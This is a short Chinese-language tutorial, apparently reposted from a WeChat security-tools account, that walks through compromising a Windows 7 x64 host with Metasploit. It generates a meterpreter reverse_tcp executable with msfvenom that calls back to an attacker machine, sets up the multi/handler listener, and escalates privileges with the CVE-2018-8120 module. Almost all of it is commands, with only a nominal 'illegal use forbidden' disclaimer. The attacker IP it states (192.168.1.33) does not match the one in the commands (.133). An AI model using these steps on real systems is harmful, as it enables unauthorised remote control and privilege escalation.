其实我挺羡慕火车的,为什么?“他们连擦肩而过都那么久。。。。”
---- 网易云热评
一、生成木马
目标主机:192.168.1.129(win7 x64)
攻击机:192.168.1.33
攻击端口:12121
生成木马:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe
二、进入监听模块 use exploit/multi/handler
三、设置payload反弹 set windows/x64/meterpreter/reverse_tcp
四、查看需要设置的参数:show options
五、设置攻击机ip:set lhost 192.168.1.133
六、设置攻击端口:set lport 12121
七、将生成的exe文件上传到目标主机并运行
八、run攻击
九、getuid 查看权限
十、background 后台运行
十一、搜索我们要利用的模块 search cve-2018-8120,并选择进入
十二、run,运行,并重新查看权限
禁止非法,后果自负
欢迎关注公众号:web安全工具库
本文分享自微信公众号 - web安全工具库(websec-tools)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。